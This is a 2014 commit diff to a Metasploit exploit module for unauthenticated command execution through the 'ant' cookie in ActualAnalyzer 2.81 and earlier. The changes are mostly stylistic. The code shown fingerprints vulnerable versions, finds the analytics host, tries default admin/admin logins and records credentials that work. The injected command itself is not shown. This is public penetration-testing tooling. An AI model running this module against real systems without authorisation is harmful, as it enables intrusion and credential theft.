Merge pull request #1 from jhart-r7/landing-4328

bcoles · bcoles · commit f1f57c6ed92d · 2014-12-14T23:04:13.000+11:00
Minor improvements to actual analyzer ant cookie exploit
diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -11,10 +11,11 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
       'Description'     => %q{
-          This module exploits a command execution vulnerability in
+        This module exploits a command execution vulnerability in
         ActualAnalyzer version 2.81 and prior.
 
         The 'aa.php' file allows unauthenticated users to
@@ -47,13 +48,14 @@ def initialize(info = {})
       'Privileged'      => false,
       'DisclosureDate'  => 'Aug 28 2014',
       'DefaultTarget'   => 0))
-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
-          OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
-          OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
-          OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
-        ], self.class)
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
+        OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
+        OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
+        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
+      ], self.class)
   end
 
   #
@@ -77,10 +79,9 @@ def check
     if !res
       vprint_error("#{peer} - Connection failed")
       return Exploit::CheckCode::Unknown
-    elsif res.code == 200 && res.body =~ /title="ActualAnalyzer Lite \(free\) ([\d\.]+)"/
-      version = $1
+    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
       vprint_status("#{peer} - Found version: #{version}")
-      return Exploit::CheckCode::Vulnerable if version =~ /^2\.(81|80|[0-7])/
+      return Exploit::CheckCode::Vulnerable if Gem::Version.new(version) <= Gem::Version.new('2.81')
       return Exploit::CheckCode::Detected
     elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
       return Exploit::CheckCode::Detected
@@ -116,13 +117,12 @@ def get_analytics_host_view
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.body =~ /<option value="?[\d]+"?[^>]*>Page: https?:\/\/([^\/^<]+)/
-      analytics_host = $1
+    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on view.php")
     end
-    analytics_host
   end
 
   #
@@ -138,13 +138,12 @@ def get_analytics_host_code
     )
     if !res
       vprint_error("#{peer} - Connection failed")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
-      analytics_host = $1
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on code.php")
     end
-    analytics_host
   end
 
   #
@@ -178,8 +177,7 @@ def get_analytics_host_admin
       vprint_error("#{peer} - Connection failed")
     elsif res.code == 200 && res.body =~ />Login</
       vprint_status("#{peer} - Login failed.")
-    elsif res.code == 200 && res.body =~ /alt='ActualAnalyzer' src='https?:\/\/([^\/^']+)/
-      analytics_host = $1
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
       vprint_good("#{peer} - Found analytics host: #{analytics_host}")
       print_good("#{peer} - Login successful! (#{user}:#{pass})")
       service_data = {
@@ -191,7 +189,7 @@ def get_analytics_host_admin
       }
       credential_data = {
         origin_type: :service,
-        module_fullname: self.fullname,
+        module_fullname: fullname,
         private_type: :password,
         private_data: pass,
         username: user
@@ -205,14 +203,14 @@ def get_analytics_host_admin
       }
       login_data.merge!(service_data)
       create_credential_login(login_data)
+      return analytics_host
     else
       vprint_status("#{peer} - Could not find any hosts on admin.php")
     end
-    analytics_host
   end
 
   def exploit
-    if datastore['ANALYZER_HOST'].nil? || datastore['ANALYZER_HOST'] == ''
+    if datastore['ANALYZER_HOST'].blank?
       analytics_host = get_analytics_host_code
       analytics_host = get_analytics_host_view if analytics_host.nil?
       analytics_host = get_analytics_host_admin if analytics_host.nil?
